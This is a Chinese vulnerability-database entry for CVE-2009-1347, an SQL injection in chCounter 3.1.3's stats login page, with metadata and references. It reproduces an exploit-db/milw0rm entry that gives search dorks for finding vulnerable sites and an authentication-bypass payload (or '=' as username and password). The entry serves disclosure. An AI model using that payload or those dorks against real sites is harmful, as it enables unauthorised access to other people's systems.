chCounter 'counter/stats/index.php'SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117594 漏洞类型 SQL注入
发布时间 2009-04-16 更新时间 2009-04-20
CVE编号 CVE-2009-1347 CNNVD-ID CNNVD-200904-387
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8461
https://cxsecurity.com/issue/WLB-2009040207
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-387
|漏洞详情
chCounter3.1.3版本中的stats/index.php存在多个SQL注入漏洞。远程攻击者可以借助(1)登录名参数(又称用户名字段)或(2)登录密码参数(又称t密码字段),执行任意的SQL指令。
|漏洞EXP
########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]
|参考资料

来源:BID
名称:34572
链接:http://www.securityfocus.com/bid/34572
来源:MILW0RM
名称:8461
链接:http://www.milw0rm.com/exploits/8461
来源:SECUNIA
名称:24879
链接:http://secunia.com/advisories/24879